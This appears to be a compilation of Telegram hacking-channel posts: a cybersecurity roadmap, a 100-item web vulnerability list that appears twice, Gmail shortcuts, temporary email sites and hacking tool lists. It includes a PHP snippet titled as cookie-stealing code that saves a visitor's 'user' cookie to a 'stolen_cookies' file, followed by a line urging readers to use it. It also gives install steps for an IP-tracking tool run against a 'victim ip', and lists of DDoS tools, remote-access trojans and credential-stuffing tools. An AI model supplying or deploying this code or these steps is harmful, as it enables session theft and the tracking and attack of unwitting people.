🧵 Complete Cybersecurity Professional Roadmap 🧵

https://t.me/EthicalHackingToday

1. Introduction to Ethical Hacking
   - Definition
   - Purpose
   - Types of Hackers
   - Legal and Ethical Considerations

2. Networking Basics
   - TCP/IP
   - OSI Model
   - Subnetting
   - DNS
   - DHCP

3. Operating Systems
   - Linux
   - Windows
   - macOS
   - Command Line Basics

4. Cybersecurity Fundamentals
   - Encryption
   - Firewalls
   - Antivirus
   - IDS/IPS

5. Programming Languages
   - Python
   - Javascript
   - Bash Scripting
   - SQL
   - C/ C++/ Java/ Ruby

6. Scanning and Enumeration
   - Port Scanning
   - Service Enumeration
   - Vulnerability Scanning

7. Exploitation
   - Common Vulnerabilities and Exploits
   - Metasploit Framework
   - Buffer Overflows

8. Web Application Security
   - OWASP Top Ten
   - SQL Injection
   - Cross-Site Scripting (XSS)

9. Wireless Network Hacking
   - Wi-Fi Security
   - WEP, WPA, WPA2
   - Wireless Attacks

10. Social Engineering
    - Phishing
    - Spear Phishing
    - Social Engineering Toolkit (SET)

11. Sniffing and Spoofing
    - Man-in-the-Middle Attacks
    - ARP Spoofing
    - DNS Spoofing

12. Malware Analysis
    - Types of Malware
    - Sandbox Analysis
    - Signature-Based and Behavior-Based Detection

13. Incident Response and Handling
    - Incident Response Process
    - Digital Forensics
    - Chain of Custody

14. Penetration Testing
    - Types of Penetration Testing
    - Methodology
    - Reporting

15. Cryptography
    - Symmetric and Asymmetric Encryption
    - Hashing Algorithms
    - Digital Signatures

16. Mobile Hacking
    - Android and iOS Security
    - Mobile Application Security

17. Cloud Security
    - AWS, Azure, Google Cloud
    - Security Best Practices

18. IoT Security
    - Internet of Things Risks
    - Securing IoT Devices

19. Legal and Compliance
    - Computer Fraud and Abuse Act (CFAA)
    - GDPR, HIPAA, PCI DSS

20. Cybersecurity Tools
    - Nmap, Wireshark, Burp Suite
    - Snort, Nessus, Aircrack-ng

21. Career Path and Certifications
    - Certified Ethical Hacker (CEH)
    - Offensive Security Certified Professional (OSCP)
    - CISSP, CompTIA Security+

ENJOY LEARNING 👍👍

🖥 100 Web Vulnerabilities, categorized into various types : 😀

⚡️ Injection Vulnerabilities:

1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)

⚡️ Broken Authentication and Session Management:

14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse

⚡️ Sensitive Data Exposure:

22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling

⚡️ Security Misconfiguration:

28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration

⚡️ XML-Related Vulnerabilities:

37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb

⚡️ Broken Access Control:

40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control

⚡️ Insecure Deserialization:

45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection

⚡️ API Security Issues:

48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation

⚡️ Insecure Communication:

52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols

⚡️ Client-Side Vulnerabilities:

56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues

⚡️ Denial of Service (DoS):

61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service

⚡️ Other Web Vulnerabilities:

66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse

⚡️ Mobile Web Vulnerabilities:

76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering

⚡️ IoT Web Vulnerabilities:

80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities

⚡️ Web of Things (WoT) Vulnerabilities:

83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues

⚡️ Authentication Bypass:

85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass

⚡️ Server-Side Request Forgery (SSRF):

87. Blind SSR
88. Time-Based Blind SSRF

⚡️ Content Spoofing:

89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass

⚡️ Business Logic Flaws:

92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws

⚡️ Zero-Day Vulnerabilities:

98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits

Top 10 Hacking And CyberSecurity Course For FREE

Link 1 :https://bit.ly/3pXTXBZ

link 2 :https://bit.ly/3NV6n5S

link 3 :https://bit.ly/3BfUukD

link 4 :https://bit.ly/3OiMUNC

link 5 :https://bit.ly/46Ltbxk

link 6 :https://bit.ly/46QuBqu

link 7 :https://bit.ly/3Oihirn

link 8:https://bit.ly/3q0ZpnH

link 9 :https://bit.ly/44sNYV2

link 10 : https://bit.ly/3Oj5JAo

ENJOY LEARNING 👍👍

18 most used Linux commands YOU MUST KNOW

- ls
- mv
- ssh
- cd
- cat
- sudo
- pwd
- grep
- top
-mkdir
- find
- wget
- rm
- chmod
- tar
- cp
- chwon
- gzip

🌐 Here are 30 cybersecurity search engines :

1. Dehashed—View leaked credentials.
2. SecurityTrails—Extensive DNS data.
3. DorkSearch—Really fast Google dorking.
4. ExploitDB—Archive of various exploits.
5. ZoomEye—Gather information about targets.
6. Pulsedive—Search for threat intelligence.
7. GrayHatWarefare—Search public S3 buckets.
8. PolySwarm—Scan files and URLs for threats.
9. Fofa—Search for various threat intelligence.
10. LeakIX—Search publicly indexed information.
11. DNSDumpster—Search for DNS records quickly.
13. FullHunt—Search and discovery attack surfaces.
14. AlienVault—Extensive threat intelligence feed.
12. ONYPHE—Collects cyber-threat intelligence data.
15. Grep App—Search across a half million git repos.
17. URL Scan—Free service to scan and analyse websites.
18. Vulners—Search vulnerabilities in a large database.
19. WayBackMachine—View content from deleted websites.
20. Shodan—Search for devices connected to the internet.
21. Netlas—Search and monitor internet connected assets.
22. CRT sh—Search for certs that have been logged by CT.
20. Wigle—Database of wireless networks, with statistics.
23. PublicWWW—Marketing and affiliate marketing research.
24. Binary Edge—Scans the internet for threat intelligence.
25. GreyNoise—Search for devices connected to the internet.
26. Hunter—Search for email addresses belonging to a website.
27. Censys—Assessing attack surface for internet connected devices.
28. IntelligenceX—Search Tor, I2P, data leaks, domains, and emails.
29. Packet Storm Security—Browse latest vulnerabilities and exploits.
30. SearchCode—Search 75 billion lines of code from 40 million projects.

⭕️ G-Mail keyboard shortcuts ⭕️
#pc_feature #OldPost

Here is the complete list of Gmail keyboard shortcuts:

Compose and Chat

<Shift> + <Esc> : Focus main window
<Esc> : Focus latest chat or compose
<Ctrl> + . : Advance to next chat or compose
<Ctrl> + , : Advance to previous chat or compose
<Ctrl> + <Enter> : Send
<Ctrl> + <Shift> + c : Add cc recipients
<Ctrl> + <Shift> + b : Add bcc recipients
<Ctrl> + <Shift> + f : Access custom from
<Ctrl> + k : Insert a link
<Ctrl> + ; : Go to previous misspelled word
<Ctrl> + ' : Go to next misspelled word
<Ctrl> + m : Open spelling suggestions

Formatting

<Ctrl> + <Shift> + 5 : Previous font
<Ctrl> + <Shift> + 6 : Next font
<Ctrl> + <Shift> + - : Decrease text size
<Ctrl> + <Shift> + + : Increase text size
<Ctrl> + b : Bold
<Ctrl> + i : Italics
<Ctrl> + u : Underline
<Ctrl> + <Shift> + 7 : Numbered list
<Ctrl> + <Shift> + 8 : Bulleted list
<Ctrl> + <Shift> + 9 : Quote
<Ctrl> + [ : Indent less
<Ctrl> + ] : Indent more
<Ctrl> + <Shift> + l : Align left
<Ctrl> + <Shift> + e : Align center
<Ctrl> + <Shift> + r : Align right
<Ctrl> + <Shift> + , : Set right-to-left
<Ctrl> + <Shift> + . : Set left-to-right
<Ctrl> + \ : Remove formatting


Jumping

g then i : Go to Inbox
g then s : Go to Starred conversations
g then t : Go to Sent messages
g then d : Go to Drafts
g then a : Go to All mail
g then c : Go to Contacts
g then k : Go to Tasks
g then l : Go to Label

Threadlist selection

* then a : Select all conversations
* then n : Deselect all conversations
* then r : Select read conversations
* then u : Select unread conversations
* then s : Select starred conversations
* then t : Select unstarred conversations

Navigation

u : Back to threadlist
k / j : Newer/older conversation
o or <Enter> : Open conversation; collapse/expand conversation
p / n : Read previous/next message
` : Go to next inbox section
~ : Go to previous inbox section

Application

c : Compose
d : Compose in a tab (new compose only)
/ : Search mail
q : Search chat contacts
. : Open "more actions" menu
v : Open "move to" menu
l : Open "label as" menu
? : Open keyboard shortcut help

Actions

, : Move focus to toolbar
x : Select conversation
s : Rotate superstar
y : Remove label
e : Archive
m : Mute conversation
! : Report as spam
# : Delete
r : Reply
<Shift> + r : Reply in a new window
a : Reply all
<Shift> + a : Reply all in a new window
f : Forward
<Shift> + f : Forward in a new window
<Shift> + n : Update conversation
] / [ :  Remove conversation from current view and go previous/next
} / { : Archive conversation and go previous/next
z : Undo last action
<Shift> + i : Mark as read
<Shift> + u : Mark as unread
_ : Mark unread from the selected message
+ or = : Mark as important
- : Mark as not important
<Shift> + t : Add conversation to Tasks

List of disposable mail services

✖️Domain EDU✖️

https://tempmaili.com/
https://temp-mailbox.com/10minutemail/
https://10-minutemail.com/

▪️Gmailnators▪️

https://emailnator.com/
https://tempmail.dev/en/Gmail

▪️Domain Com▪️

https://inboxes.com/

✖️Domain Regular✖️

https://etempmail.net/10minutemail
https://cloudtempmail.com/en
https://www.10minuteemails.com/mailbox
https://tenminutesmail.net/en
https://1secmail.ru/
https://tempmail.run/
https://email10min.net/
https://www.temporary-email.org/
https://mailtemp.net/

➡️ Give Reactions 🤟

🔰7 Best Hacking Tools Everyone Must Know🔰

1. Nmap
It is a free and open-source tool that is used for network discovery and security auditing.

2. Metasploit
It is basically a Security Assessment and Penetration Testing tool. Metasploit can be used to launch an attack on other systems with it.

3. Angry IP Scanner
It is one of the fastest IP addresses and port scanner. By using this hacker can easily gather information about open ports in the target system.

4. Nikto
It is a webserver assessment tool. Nikto is an open-source platform that performs tests against Web Servers to find various vulnerable files, misconfigurations, outdated servers and programs on that web server.

5. John the Ripper
JTR is free and open-source software that is widely used by hackers for password cracking. It uses the various cryptanalysis attacks such as “Dictionary Attack” and “Brute-Force Attack”.

6. Wireshark:
It is an open-source tool that is used to capture traffic on the network. It is basically a network protocol analyzer tool.

7. Burp Suite:
It is an integrated platform that is used for performing a test on web application security.

➡️ Give Reactions 🤟

TUTORIAL : How To Change Your IP Address

ʏᴏᴜ ᴄᴏᴜʟᴅ ᴅᴏ ᴛʜɪs ʟᴇss ᴛʜᴀɴ ᴀ ᴍɪɴᴜᴛᴇ

𝗚𝘂𝗶𝗱𝗲 -

Click on "Start" in the bottom left hand corner of 𝘀𝗰𝗿𝗲𝗲𝗻

Click on "Run"

Type in "command" and hit ok
You should now be at an MSDOS prompt screen.

Type "ipconfig /release" just like that, and hit "enter"

Type "exit" and leave the prompt
• Right-click on "Network Places" or "My Network Places" on your desktop.

Click on "properties" You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

Right click on "Local Area Connection" and click "properties"

Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" 𝘁𝗮𝗯

Click on "Use the following IP address" under the "General" 𝘁𝗮𝗯

Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).

Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.

Hit the "Ok" button 𝗵𝗲𝗿𝗲

Hit the "Ok" button again You should now be back to the "Local Area Connection" screen.

Right-click back on "Local Area Connection" and go to properties again.

Go back to the "TCP/IP" 𝘀𝗲𝘁𝘁𝗶𝗻𝗴𝘀

This time, select "Obtain an IP address automatically" tongue.gif

18. Hit "Ok"

Hit "Ok" 𝗮𝗴𝗮𝗶𝗻

➡️ Give Reactions 🤟

❇️Shut Down your ANDROID Device by Making Call from Another Phone (like a pro)
➖➖➖➖➖➖➖➖➖➖➖➖

🔹Step 1: First of all, download and install the Automateit app. This app needs root access. So, make sure to grant the root permission.

🔹Step 2: Next, select ‘My Rules’ and tap on the (+) icon.

🔹Step 3: In the next screen tap on the ‘Call State Trigger’

🔹Step 4: Now, choose the option ‘Incoming Call’

🔹Step 5; In the next step, select the contact. You can choose from saved contacts or can create a new one.

🔹Step 6: Now tap on ‘Next’ and on the next screen, select ‘Shutdown Device Action’

🔹Step 7: Now you need to provide the name for the rule and save the rule.

Now you just need to make a call from the contact you specified and your Android device will be shut down.

Track Location With Live Address And City in Termux

IpHack: is a tracking tool for both IP location and tracking testing.

Installation ~

apt update && apt upgrade

apt install git

git clone https://github.com/mishakorzik/IpHack

cd IpHack

bash setup.sh

chmod +x *

cd IpHack

python IpHack.py -t (victim ip)

Enjoy 🤟

➡️ Give 100+ Reactions 🤟

🔰 Best Websites To Test Your Hacking Skills 🔰

https://pwnable.kr/
https://hack.me/
https://ctflearn.com/
https://google-gruyere.appspot.com/
https://www.root-me.org/en/
https://www.hackthebox.eu/
https://www.hacking-lab.com/
http://www.gameofhacks.com/
https://overthewire.org/
https://microcorruption.com/
https://xss-game.appspot.com/?utm_source...dium=email
https://crackmes.one/
https://pentest.training/
https://www.hellboundhackers.org/
http://hax.tor.hu/
https://thisislegal.com/
https://tryhackme.com

➡️ Give Reactions 🤟

#lifehack

How to always run Google Chrome in incognito mode in Windows 10

If you want to use "Incognito" mode in Google Chrome browser by default, you can set it to start in that mode right away.

1. Right-click on the Chrome shortcut and select "Properties".
3. On the "Shortcut" tab, find the "Object" text box. It will contain the following:
"C:Program Files (x86)GoogleChromeApplicationchrome.exe".
4. modify the content of the "Object" field by adding "-incognito" at the end, separated by a space.
5. Click on "Apply".

The next time you open Chrome using this shortcut, it will automatically launch in "Incognito" mode.

✨COOKIE STEALING CODE IN PHP STORES ON CPANEL✨

<?php
// Steal the user's cookies
if (isset($_COOKIE['user'])) {
    //store in file
    $cookie = json_encode($_COOKIE['user']);
    $filename = 'stolen_cookies_' . date('m_d_Y') . '.txt';
    file_put_contents('/filemanager/'. $filename, $cookie);
}
?>

⚠️USE YOUR BRAIN NOW TO IMPLEMENT ON  YOUR STUFF 😈

➡️ Give Reactions 🤟

🖥 100 Web Vulnerabilities, categorized into various types : 😀

⚡️ Injection Vulnerabilities:

1. SQL Injection (SQLi)
2. Cross-Site Scripting (XSS)
3. Cross-Site Request Forgery (CSRF)
4. Remote Code Execution (RCE)
5. Command Injection
6. XML Injection
7. LDAP Injection
8. XPath Injection
9. HTML Injection
10. Server-Side Includes (SSI) Injection
11. OS Command Injection
12. Blind SQL Injection
13. Server-Side Template Injection (SSTI)

⚡️ Broken Authentication and Session Management:

14. Session Fixation
15. Brute Force Attack
16. Session Hijacking
17. Password Cracking
18. Weak Password Storage
19. Insecure Authentication
20. Cookie Theft
21. Credential Reuse

⚡️ Sensitive Data Exposure:

22. Inadequate Encryption
23. Insecure Direct Object References (IDOR)
24. Data Leakage
25. Unencrypted Data Storage
26. Missing Security Headers
27. Insecure File Handling

⚡️ Security Misconfiguration:

28. Default Passwords
29. Directory Listing
30. Unprotected API Endpoints
31. Open Ports and Services
32. Improper Access Controls
33. Information Disclosure
34. Unpatched Software
35. Misconfigured CORS
36. HTTP Security Headers Misconfiguration

⚡️ XML-Related Vulnerabilities:

37. XML External Entity (XXE) Injection
38. XML Entity Expansion (XEE)
39. XML Bomb

⚡️ Broken Access Control:

40. Inadequate Authorization
41. Privilege Escalation
42. Insecure Direct Object References
43. Forceful Browsing
44. Missing Function-Level Access Control

⚡️ Insecure Deserialization:

45. Remote Code Execution via Deserialization
46. Data Tampering
47. Object Injection

⚡️ API Security Issues:

48. Insecure API Endpoints
49. API Key Exposure
50. Lack of Rate Limiting
51. Inadequate Input Validation

⚡️ Insecure Communication:

52. Man-in-the-Middle (MITM) Attack
53. Insufficient Transport Layer Security
54. Insecure SSL/TLS Configuration
55. Insecure Communication Protocols

⚡️ Client-Side Vulnerabilities:

56. DOM-based XSS
57. Insecure Cross-Origin Communication
58. Browser Cache Poisoning
59. Clickjacking
60. HTML5 Security Issues

⚡️ Denial of Service (DoS):

61. Distributed Denial of Service (DDoS)
62. Application Layer DoS
63. Resource Exhaustion
64. Slowloris Attack
65. XML Denial of Service

⚡️ Other Web Vulnerabilities:

66. Server-Side Request Forgery (SSRF)
67. HTTP Parameter Pollution (HPP)
68. Insecure Redirects and Forwards
69. File Inclusion Vulnerabilities
70. Security Header Bypass
71. Clickjacking
72. Inadequate Session Timeout
73. Insufficient Logging and Monitoring
74. Business Logic Vulnerabilities
75. API Abuse

⚡️ Mobile Web Vulnerabilities:

76. Insecure Data Storage on Mobile Devices
77. Insecure Data Transmission on Mobile Devices
78. Insecure Mobile API Endpoints
79. Mobile App Reverse Engineering

⚡️ IoT Web Vulnerabilities:

80. Insecure IoT Device Management
81. Weak Authentication on IoT Devices
82. IoT Device Vulnerabilities

⚡️ Web of Things (WoT) Vulnerabilities:

83. Unauthorized Access to Smart Homes
84. IoT Data Privacy Issues

⚡️ Authentication Bypass:

85. Insecure "Remember Me" Functionality
86. CAPTCHA Bypass

⚡️ Server-Side Request Forgery (SSRF):

87. Blind SSR
88. Time-Based Blind SSRF

⚡️ Content Spoofing:

89. MIME Sniffing
90. X-Content-Type-Options Bypass
91. Content Security Policy (CSP) Bypass

⚡️ Business Logic Flaws:

92. Inconsistent Validation
93. Race Conditions
94. Order Processing Vulnerabilities
95. Price Manipulation
96. Account Enumeration
97. User-Based Flaws

⚡️ Zero-Day Vulnerabilities:

98. Unknown Vulnerabilities
99. Unpatched Vulnerabilities
100. Day-Zero Exploits

➡️ Give 100+ Reactions 😎

🔥🔥 If you want to become a hacker, it is essential to always be knowledgeable about what steps to do🔥🔥

1-Network Plus
2-CEH
3-Linux Commands
4-Cmd Commands
5-Windows Tools
6-Kali Linux Tools
7-Learning Php
8-Learning Python
9-Learning Ruby
10-Learning Perl
...
#exploithub

1-DDoS
2-Forensics
3-Programming
4-Exploitation
5-Phone Hacking
6-Server Hacking
7-Client Hacking
8-Website Hacking
9-Network Hacking
10-Wireless Hacking
11-Reverse Engeenering
12-Information Gathering

#DDoS
1-MDK3
2-LOIC
3-HULK
4-DDOSIM
5-Ufonet
6-Hping3
7-Xerxes
8-Hammer
9-Slowloris
10-Websploit
11-GoldenEye
12-Metasploit
13-Aireplay-ng
14-Slowhttptest

#Forensics
1-COFEE
2-Volafox
3-Autopsy
4-Foremost
5-Hashdeep
6-Binwalk

#Programming
1-Notepad++
2-Visual Studio
3-Text Editor

#Exploitation
1-Metasploit
2-Sqlmap
3-Core Imact
4-W3af
5-BeEF
6-Dradis

#Phone_Hacking
1-Metasploit
2-Apktool
3-Droidjack
4-AndroRAT
5-Spynote

#Server_Hacking
1-SQLmap
2-Jsql
3-Havij
4-Hydra
5-Metasploit
6-Armitage
7-Brupsuite
8-Owasp-ZAP
9-Netsparker
10-Acunetix
11-OpenVAS

#Client_Hacking
1-Darkcomet
2-FatRat
3-Veil-Evasion
4-Shallter
5-Unicorn
6-Setoolkit
7-Armitage
8-BeEF-Framework
9-EmPyre
10-FakeImageExploiter
11-Pupy
12-DFU-Programmer
13-Cobalt Strike
14-Exploitpack
15-Gcat
16-Crowbar

#Website_Hacking
1-Sn1per
2-Owasp-ZAP
3-Brupsuite
4-Netsparker
5-Acunetix
6-SQLmap
7-Xsser
8-WPScan
9-Joomrra
10-Joomscan
11-WPSeku
12-XSStrike
13-Kadimus
14-jexboss
15-CMSmap
16-brut3k1t
17-0d1n
18-CloudFail
19-Arachni
20-Nikto
21-Webscarab
22-Nmap
23-Vbscan
24-Sentry MBA

#Network_Hacking
1-MITMf
2-Bettercap
3-Ettercap
4-Tcpdump
5-Wireshark
6-Driftnet
7-SSLstrip
8-Armitage
9-Metasploit
10-Xerosploit
11-Sparta
12-Hydra

#Wireless_Hacking
1-Wifite
2-Airodump-ng
3-Aireplay-ng
4-Wash
5-WiFi Pumpkin
6-Wifiphisher
7-Fluxion
8-Infernal Twin
9-WPSpin

#Reverse_Engeenering
1-OWASP-ZSC
2-OllyDBG
3-Apktool

#Information_Gathering
1-Enum
2-Recon
3-Whois
4-Email Contact
5-Phone Contact
6-Service Status
7-Protocol Analysis